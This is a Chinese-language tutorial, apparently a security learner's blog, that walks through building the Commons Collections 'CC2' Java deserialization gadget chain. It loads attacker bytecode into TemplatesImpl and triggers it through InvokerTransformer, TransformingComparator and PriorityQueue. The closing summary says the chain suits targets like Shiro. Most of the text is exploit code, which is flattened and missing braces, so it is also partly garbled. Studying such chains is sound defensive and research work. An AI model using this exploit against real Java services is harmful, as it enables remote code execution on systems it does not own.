环境
和cc4相同
CC2 这条链实际上是在 CC4 链基础上的修改,目的是为了避免使用 Transformer 数组。
exp的编写
那么我们就需要找能够调用newTransformer的方法。
1 2 3 4 5 6 7 8 9 10 11 12 13 TemplatesImpl templates = new TemplatesImpl(); Class aClass = templates.getClass(); Field nameField = aClass.getDeclaredField("_name" ); nameField.setAccessible(true ); nameField.set(templates,"zer0" ); Field bytecodesField = aClass.getDeclaredField("_bytecodes" ); bytecodesField.setAccessible(true ); byte [] evil = Files.readAllBytes(Paths.get("F:\\code\\CCTest\\src\\main\\java\\Calc.class" ));byte [][] codes = {evil};bytecodesField.set(templates,codes);
前面的链子采用cc4的前半部分
1 2 3 4 5 6 7 InvokerTransformer<Object, Object> InvokernewTransformer = new InvokerTransformer<>("newTransformer" , new Class[]{}, new Object[]{}); TransformingComparator transformingComparator = new TransformingComparator<>(InvokernewTransformer); PriorityQueue priorityQueue = new PriorityQueue<>(transformingComparator); priorityQueue.add(1 ); priorityQueue.add(2 );
最终exp
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;import org.apache.commons.collections4.comparators.TransformingComparator;import org.apache.commons.collections4.functors.ConstantTransformer;import org.apache.commons.collections4.functors.InstantiateTransformer;import org.apache.commons.collections4.functors.InvokerTransformer;import javax.xml.transform.Templates;import java.io.*;import java.lang.reflect.Field;import java.nio.file.Files;import java.nio.file.Paths;import java.util.PriorityQueue;public class CC2Test public static void main (String[] args) throws NoSuchFieldException, IllegalAccessException, IOException, ClassNotFoundException TemplatesImpl templates = new TemplatesImpl(); Class aClass = templates.getClass(); Field nameField = aClass.getDeclaredField("_name" ); nameField.setAccessible(true ); nameField.set(templates,"zer0" ); Field bytecodesField = aClass.getDeclaredField("_bytecodes" ); bytecodesField.setAccessible(true ); byte [] evil = Files.readAllBytes(Paths.get("F:\\code\\CCTest\\src\\main\\java\\Calc.class" )); byte [][] codes = {evil}; bytecodesField.set(templates,codes); InvokerTransformer<Object, Object> InvokernewTransformer = new InvokerTransformer<>("newTransformer" , new Class[]{}, new Object[]{}); TransformingComparator transformingComparator = new TransformingComparator<>(new ConstantTransformer<>(1 )); PriorityQueue priorityQueue = new PriorityQueue<>(transformingComparator); priorityQueue.add(templates); priorityQueue.add(templates); Class c = transformingComparator.getClass(); Field transformerField = c.getDeclaredField("transformer" ); transformerField.setAccessible(true ); transformerField.set(transformingComparator,InvokernewTransformer); unserialization("./2.ser" ); } public static void serialize (Object obj) throws IOException ObjectOutputStream out_obj1 = new ObjectOutputStream(new FileOutputStream("./2.ser" )); out_obj1.writeObject(obj); out_obj1.close(); } public static Object unserialization (String Filename) throws IOException, ClassNotFoundException ObjectInputStream obj2 = new ObjectInputStream(new FileInputStream(Filename)); Object ois = obj2.readObject(); return ois; } }
小结
CC2 链区别与其他链子一点的区别在于没有用 Transformer 数组。不用数组是因为比如 shiro 当中的漏洞,它会重写很多动态加载数组的方法,这就可能会导致我们的 EXP 无法通过数组实现。
至此的流程图
